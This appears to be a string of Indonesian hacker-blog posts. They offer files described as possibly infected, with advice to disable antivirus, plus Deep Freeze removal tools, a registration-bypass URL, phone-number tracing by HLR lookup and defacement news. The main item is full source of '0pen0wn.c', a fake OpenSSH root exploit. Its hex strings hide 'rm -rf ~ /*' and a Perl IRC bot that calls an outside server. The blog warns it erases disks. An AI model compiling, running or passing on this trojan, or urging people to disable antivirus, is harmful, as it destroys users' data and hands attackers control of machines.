The famous love letter from Kim Komando ( komando.com )
I got this file since 1998, and now people sold it for $ 24,99
I’ll gave it for free
You can download 101 Love Letter here
Dont forget to say thanks

These files might be contain with viruses
Dont forget to turn off your antivirus 1st
Use at your own risk

a ./._UDF.rar
a UDF.rar
a ./._AntiDeepfreezeStandar-d60pc.com.rar
a AntiDeepfreezeStandar-d60pc.com.rar
a ./._undeep
a undeep
a undeep/._dfnew.JPG
a undeep/dfnew.JPG
a undeep/._idsh.txt
a undeep/idsh.txt
a undeep/._Remove_Password_Deep_Freeze.exe
a undeep/Remove_Password_Deep_Freeze.exe

Prefention : use original Deep Freeze instead of piracy one

Credits to #14 and the creator
Download it here

Special case if
#systemsetup -setkernelbootarchitecture x86_64
cannot run while restarting, or by pressing “6″ and “4″ while loading

To run 64-bit kernel on any mac with 64-bit efi you need patched boot.efi file
You can find file named boot64.efi from your own OS, patch the boot.efi to enables 64 bit kernel
It enables 64-bit kernel support for some macmini/macbook/imac/macbookair models, which has 64-bit efi bootrom.
run these commands

cd ~/Desktop
sudo cp /System/Library/CoreServices/boot.efi /blah/user/Desktop/boot64.efi
edit the binary with hexeditor, example im using mac mini and replacing the value like stated below

Then
sudo cp /Users/blah/Desktop/boot64.efi /System/Library/CoreServices/
cd /System/Library/CoreServices/
sudo chown root:wheel boot64.efi
sudo chflags uchg boot64.efi
sudo bless --folder /System/Library/CoreServices/ --file /System/Library/CoreServices/boot64.efi

Next step – add arch=x86_64 to file /Library/Preferences/SystemConfiguration/com.apple.Boot.plist to Kernels Flags section
For example:
Kernel Flags
arch=x86_64
or
#nvram boot-args=”arch=x86_64?
or
#systemsetup -setkernelbootarchitecture x86_64

Now reboot, your mac should boot 64-bit kernel, but some models missing 64-bit intel video drivers, for example macbook4,1 with gmax3100, so only internal display will work, without qe/ci/opengl.
if something goes wrong, boot leopard/snowleopard dvd (or another installed osx system) and run this command in terminal

sudo bless -–folder /Volumes/YOUVOLUMENAME/System/Library/CoreServices -–file /Volumes/YOUVOLUMENAME/System/Library/CoreServices/boot.efi

p.s. if you have 32-bit efi, this commands will make no effect for you at all.

Mac Mini 3,1

change value 0×00 to 0×80 of boot.efi address 0×266db , Kenerl is LP64 on macmini3,1.

old
00266d0 30 47 01 00 00 00 00 00 00 00 00 00 00 00 00 00
–
new
00266d0 30 47 01 00 00 00 00 00 00 00 00 80 00 00 00 00

sh-3.2# uname -a
Darwin aRifs-Mac-mini.local 10.2.0 Darwin Kernel Version 10.2.0: Tue Nov 3 10:35:19 PST 2009; root:xnu-1486.2.11~1/RELEASE_X86_64 x86_64

MacBook Pro 3,1

Old -> 0×26708: 4B 47 01 00 00 00 00 00 04 00 00 00 00 00 00 00
New -> 0×26708: 4B 47 01 00 00 00 00 00 03 00 00 00 00 00 00 00

iMac7,1
modify boot64.efi on position 0×26718
Old: 0×0C
New: 0×07

Use at your own Risk :p

Al-hamdu lillaahi rabbil-‘aalamiin, ar-rahmaanir-rahiim. Hanya dengan nikmat Allah SWT kita dapat melalui saat-saat menyenangkan dan saat-saat tidak menyenangkan dalam keadaan iman islam. Pada hakekatnya kejadian di dunia ini tidak ada yang terjadi secara kebetulan, semuanya sudah ada dalam kitab yang terpelihara (Lauh Mafuzh). Fa bi ayyi aalaa’i rabbikumaa tukadzdzibaan.
Telah berpulang ke haribaan Allah SWT Rini Dewi Ratna Lestari binti Soedirman Abdullah, pada hari Senin dini hari tanggal 16 Nopember 2009 di Rangkasbitung. Innaa lillaahi wa innaa ilaihi raaji’uun. Allahummaghfir lahaa, warhamhaa, wa ‘afihaa, wa’ fu‘anhaa, wa ‘adzkhilhaa janata, wa qihaa fitnata qabri wa qihaa ‘adzaabannaar. Allaahumma laa tahrimnaa ajrahaa wa laa taftinnaa ba’dahaa waghfir lanaa walahaa.

Almarhumah dalam keluarga Soedirman Abdullah adalah seorang anak yang menyejukkan hati ibu-bapaknya, seorang adik dan juga seorang kakak yang solehah yang menjadi panutan dalam melakukan peribadatan dan juga bermuamallah. Cita-citanya ingin menyenangkan hati kedua orang tuanya, tidak ingin menyusahkan orang tua dan tidak juga orang lain. Keinginannya adalah membantu siapapun yang membutuhkan pertolongannya dan selalu berusaha mendapatkan yang terbaik. Semuanya telah diusahakan dan dilakukan dengan sabar, tawakal dan qanaah. Rabbanaa taqabbal minha innaka antas samii’ul ‘aliim.

Berita kematianmu sungguh tidak terduga, karena masih segar dalam ingatan saat engkau berceloteh tentang pengalamanmu mengikuti latihan dasar kemiliteran dengan penuh canda bersama ibu-bapak, adik-adik dan keponakanmu dalam perjalanan senja hari menuju rumah. Engkau mencoba tersenyum untuk menghibur orang-orang di sekitarmu, walaupun terlihat sangat lelah. Dengan dibalut pakaian yang sangat lusuh, di mata keluargamu engkau terlihat sangat cantik dan bercahaya. Saat engkau berpamitan kepada ibu-bapakmu untuk melaksanakan tugas kantor ke Rangkasbitung terlihat biasa-biasa saja dan cahayamu juga tetap bersinar. Ketika engkau meminta ayahmu mengantarkan file yang tertinggal ke kantormu di pagi hari dan ketika engkau tidak membalas pesan singkat adikmu di pagi buta, membuat hati ini berdebar terlebih lagi ketika engkau tidak menjawab panggilan ayahmu melalui ponsel. Suatu hal yang tidak biasa kamu lakukan sebelumnya; sesibuk dan sesulit apapun, kapan dan dimanapun engkau berada. Akhirnya berita duka itu datang juga dari petugas kepolisian Rangkasbitung, tidak lama setelah ayahmu tiba di rumah selesai melaksanakan amanahmu yakni mengantarkan file itu. Kata-kata yang paling tepat terucap saat itu hanyalah: Innaa lillaahi wa innaa ilaihi raaji’un.

Al-hamdulillaahi rabbil ‘aalamiin, berkat doa dan bantuan semua pihak kewajiban seorang muslim dalam mengurus jenazah telah dilakukan dengan baik dan tertib. Keluarga Soedirman Abdullah sebagai ahli waris mendapat amanah untuk menyelesaikan hutang-hutang almarhumah oleh karena itu dengan segala kerendahan hati kami menghimbau saudara, sahabat, teman dan rekan kerjanya dapat menyeselesaikan hal tersebut dengan ahli waris secara ma’ruf. Keluarga Soedirman Abdullah juga mengucapkan terima kasih kepada semua pihak atas doa dan bantuannya untuk kepergian Rini Dewi Ratna Lestari binti Soedirman Abdullah; jazaakumullaahu khairaan katsiraan. Rabbigh fir lii, wa li waalidayya wa liman dakhala baitiya mu’minaw wa lil mu’miniina wal mu’minaat. Amin ya rabbal ‘aalamiin.

Selamat jalan anakku, saudaraku, sahabatku, rekan kerjaku dan kekasihku; semoga Allah SWT selalu memberimu kebaikan. Hal jazaa’ul ihsaani illal ihsaan.

Wa man ‘amila shaaliham min zakarin au untsaa wa huwa mu’minun fa ulaa’ika yadkhuluunal – jannah.

selamat jalan bunda, doa ayah akan senantiasa menyertai bunda selamanya.

Berita terkait :

Dewi Ratna Lestari
KOMPAS.com – Dewi Ditemukan Meninggal di Hotel

Esia suka suka is the latest product from Bakrie telecom that allow the costumer to choose and register their CDMA number through their web.
Their vulnerability is allowed user to bypass the “seach” and “suggested number”
its probably low vulnerabilty, but considered useful

Click here for details.
To avoid iframe from http://www.myesia.com/sukasuka/ you can directly go to
http://202.152.195.25/portal/portal/mdn/default/
which is contain default settings in their JBoss CMS too
happy hunting kiddos

Above is screen shot of jasakom.com that claimed to be hacked by tbd malaysia.
Is that true that someone from jasakom that pull the trigger for this situation?
Because tbd said someone is get into their webserver and drop their databases…
Probably this is the side effect from the confrontation between unresponsible parties that cause defacement indonesian and malaysian sites

At Friday Aug 28, 2009 Apache server got hacked.
Apparently the intruder got into by accessing their SSH key authentication.
As they mentioned in they blog “The account was accessed using SSH key authentication from this host.”

The attackers created several files in the directory containing files for www.apache.org, including several CGI scripts. These files were then rsynced to our production webservers by automated processes. At about 07:00 on August 28 2009 the attackers accessed these CGI scripts over HTTP, which spawned processes on our production web services.

And they said
“To the best of our knowledge at this time, no end users were affected by this incident, and the attackers were not able to escalate their privileges on any machines.
While we have no evidence that downloads were affected, users are always advised to check digital signatures where provided.”

You can read their complete reports on their blog https://blogs.apache.org/infra/entry/apache_org_downtime_initial_report

Now from us we launch new feature for you.
Trace Indonesian mobile phone number by HLR (Home Location Register), kind of HLR Lookup with multiple operators, such as

• Telekomunikasi Selular [Kartu Halo, Simpati, Kartu AS]
• Indosat (Cellular) [IM3, Mentari, Matrix]
• Indosat (Fixed) [Starone]
• Excelcomindo Pratama [XL]
• Hutchison CP Telecommunications [Three]
• Natrindo Telepon Seluler [Axis]
• Bakrie Telecom [Esia]
• Telekomunikasi Indonesia [PSTN, Flexi]
• Mobile-8 Telecom (Cellular) [Fren]
• Mobile-8 Telecom (Fixed) [Hepi]
• Smart Telecom [Smart]
• Sampoerna Telekomunikasi Indonesia [Ceria]
• Pasifik Satelit Nusantara [Byru]

HLR is a database of the NSS in the MSC contains customer information and the information each user is located and registered in the GSM system in the city where MSC is located.
HLR properly route through the PSTN to the phone every conversation was exploring (roaming) to the HLR customers who are visiting.
Ok lets get to the point, http://antihackerlink.or.id/hlr-lookup

Matasano.com one of well known security related website is hacked by anti-sec movement today.
its written in the site

th1s m3ss4g3 br0ught t0 u by th3 just1f13d 4nc1ents 0f 0r0b0r0z
pr0ud supp0rt3rz 0f pr0j3kt m4yh3m & the Anti-sec Movement

you can see the defacement page http://antihackerlink.or.id/matasano.html

So what next

The 0day code “exploit” for openssh Linux and FreeBSD now can be downloaded.
But Please DO NOT EXECUTE it if you did not know anything about shell code.
Because there are a lines in there that will delete your entire hardisk !!!
You have to modify first from the source code, than (maybe) you can use it

Here is the head of the code

/* 0pen0wn.c by anti-sec group
* —————————
* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
*
*
* Takes advantage of an off-by-one
* bug in mapped authentication space on system
*/

Full Code Below

/* 0pen0wn.c by anti-sec group
* ---------------------------
* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
*
*
* Takes advantage of an off-by-one
* bug in mapped authentication space on system
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =
“\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f”
“\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26″;

char shellcode[] =
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f”
“\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”;

char fbsd_shellcode[] =
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f”
“\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70″
“\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b”
“\x2f\x74\x6d\x70\x2f\x68\x69\x0a”;
#define SIZE 0xffffff
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){
printf(”\n[+] 0pen0wn 0wnz Linux/FreeBSD\n”);
printf(” Usage: %s -h -p port\n”,arg);
printf(” Options:\n”);
printf(” \t-h ip/host of target\n”);
printf(” \t-p port\n”);
printf(” \t-d username\n”);
printf(” \t-B memory_limit 8/16/64\n\n\n”);
}

#define FD 0×080518fc
#define BD 0×08082000

int main(int argc, char **argv){
FILE *jmpinst;
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
int port=23, limit=8, target=0, sock;
struct hostent *host;
struct sockaddr_in addr;

if (geteuid()) {
puts(”need root for raw socket, etc…”);
return 1;
}

if(argc < 3){ usage(argv[0]); return 1; } printf(”\n [+] 0wn0wn – by anti-sec group\n”); if (!inet_aton(h, &addr.sin_addr)){ host = gethostbyname(h); if (!host){ printf(” [-] Resolving failed\n”); return 1; } addr.sin_addr = *(struct in_addr*)host->h_addr;
}

sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
printf(” [-] Connecting failed\n”);
return 1;
}
payload = malloc(limit * 10000);
ptr = payload+8;
memcpy(ptr,jmpcode,strlen(jmpcode));
jmpinst=fopen(shellcode+793,”w+”);
if(jmpinst){
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,”%s”,shellcode);
fclose(jmpinst);
}
ptr += strlen(jmpcode);
if(target != 5 && target != 6){
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
memset(ptr,’B',limit * 10000 – 8 – strlen(shellcode));
}
else{
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
ptr += strlen(fbsd_shellcode);
memset(ptr,’B',limit * 10000 – 8 – strlen(fbsd_shellcode));
}
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,3750,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
printf(” [-] connecting failed\n”);
}

payload[sizeof(payload)-1] = ‘\0′;
payload[sizeof(payload)-2] = ‘\0′;
send(sock,buffer,strlen(buffer),0);
send(sock,payload,strlen(payload),0);
close(sock);
free(payload);
addr.sin_port = htons(6666);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
/* v— our cool bar that says: “r0000000t!!!” */
printf(”\n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n”);
fremote(”PS1=’sh-3.2#’ /bin/sh”);
}
else
printf(” [-] failed to exploit target \n”);
close(sock);
return 0;
}

or you can download it HERE

Once again I warn you, DO NOT EXECUTE if you know nothing about scripting and programming

[sakitjiwa@iluvbugiz ~]$ vi 0pen0wn.c
[sakitjiwa@iluvbugiz ~]$ cc -o 0pen0wn 0pen0wn.c
[sakitjiwa@iluvbugiz ~]$
[sakitjiwa@iluvbugiz ~]$ strings 0pen0wn | grep rm
rm -rf ~ /* 2> /dev/null &
[sakitjiwa@iluvbugiz ~]$

here you go kiddo, be careful playing with codes